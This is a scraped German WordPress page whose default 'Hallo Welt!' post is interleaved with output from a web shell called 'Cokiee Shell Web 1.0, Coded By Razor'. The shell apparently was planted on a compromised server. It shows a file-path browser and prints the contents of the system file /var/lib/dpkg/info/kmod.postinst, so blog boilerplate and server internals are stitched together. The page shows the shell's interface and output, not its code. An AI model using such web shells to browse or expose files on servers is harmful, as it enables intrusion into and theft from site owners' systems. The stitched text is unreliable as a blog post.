Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /var/lib/dpkg/info/ |
Current File : //var/lib/dpkg/info/kmod.postinst |
#!/bin/sh -e create_etc_modules() { [ -e /etc/modules ] && return 0 cat <<END > /etc/modules # /etc/modules: kernel modules to load at boot time. # # This file contains the names of kernel modules that should be loaded # at boot time, one per line. Lines beginning with "#" are ignored. # Parameters can be specified after the module name. END chmod 644 /etc/modules } case "$1" in configure) create_etc_modules esac # Automatically added by dh_installinit if [ -x "/etc/init.d/kmod" ]; then update-rc.d kmod start 20 S . >/dev/null || exit $? fi # End automatically added section exit 0
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare